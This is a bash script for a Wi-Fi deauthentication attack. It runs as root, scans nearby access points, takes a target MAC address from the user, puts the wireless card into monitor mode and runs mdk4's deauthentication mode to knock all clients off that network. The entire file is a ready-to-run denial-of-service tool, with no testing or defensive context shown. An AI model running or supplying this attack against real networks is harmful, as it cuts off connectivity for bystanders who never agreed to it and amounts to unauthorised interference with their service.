#!/bin/bash

if [ "$(id -u)" -ne 0 ]; then
  echo "This script must be run as root, use 'sudo' or run it as root."
  exit 1
fi

command -v iw > /dev/null 2>&1 || { echo >&2 "I require iw but it's not installed. Install it. Aborting."; exit 1; }
command -v mdk4 > /dev/null 2>&1 || { echo >&2 "I require mdk4 but it's not installed. Install it. Aborting."; exit 1; }

usage() {
  echo "Usage: $0 IFACE"
  echo "Example: $0 wlan0"
  exit 1
}

if [ "$#" -ne 1 ]; then
  usage
fi

cleanup() {
  pkill mdk4
  rm MAC
  iw dev mon0 del
  exit 1
}

trap cleanup SIGINT SIGTERM SIGHUP SIGQUIT

IFACE="$1"

iwlist $IFACE scan | grep -E 'Address|ESSID' | sed 's/Cell//g' | tr -d ' ' | awk '1; NR % 2 == 0 { print "" }'

echo -n "Enter a MAC Address (e.g. FF:FF:FF:FF:FF:FF): "
read MAC

iw dev $IFACE interface add mon0 type monitor

sudo iw dev $IFACE set power_save off

echo -n $MAC >MAC && mdk4 mon0 d -b MAC
